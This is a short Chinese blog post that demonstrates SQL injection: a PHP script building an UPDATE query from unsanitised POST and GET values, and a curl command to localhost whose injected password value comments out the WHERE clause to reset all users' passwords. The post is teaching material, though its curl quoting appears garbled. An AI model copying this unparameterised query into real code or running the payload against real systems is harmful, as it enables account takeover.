模拟一次sql注入攻击

在你的web服务目录下创建一个php文件如下

<?php
$conn = db_connect();
$sql = sprintf('update users set password = "%s" where id = %s',
    $_POST['password'],
    $_GET['id']
);
echo $sql . PHP_EOL;
$result = $conn->query($sql);
if(!$result){
    echo 'sql执行出错' . PHP_EOL;
}

function db_connect() {
   $result = new mysqli('', '', '', '');
   if (!$result) {
      return false;
   }
   $result->autocommit(TRUE);
   return $result;
}

function db_result_to_array($result) {
   $res_array = array();

   for ($count=0; $row = $result->fetch_assoc(); $count++) {
     $res_array[$count] = $row;
   }

   return $res_array;
}

curl模拟访问传参 post

curl -d "password=123456";-- " http://localhost:8080/sanitize-validate-escape/sanitize-sql-bad.php?id=1

这样把 usrs表的所有记录的密码都改为了123456

查看全文

相关阅读:
C++11 中的 Defaulted 和 Deleted 函数
 php运行出现Call to undefined function curl_init()的解决方法
 Windows 8 IIS中配置PHP运行环境的方法
 中国天气预报数据API收集
 IIS 6中mimemap属性的默认设置
 使用APPCAN开发移动应用APP心得
 个人建了一个APPCAN移动前端开发交流QQ群258213194
APPCAN MAS接口之AJAX
JavaScript与DOM
如何让网页在浏览器标题栏显示自己制作的图标ico

原文地址：https://www.cnblogs.com/hlongch/p/7217679.html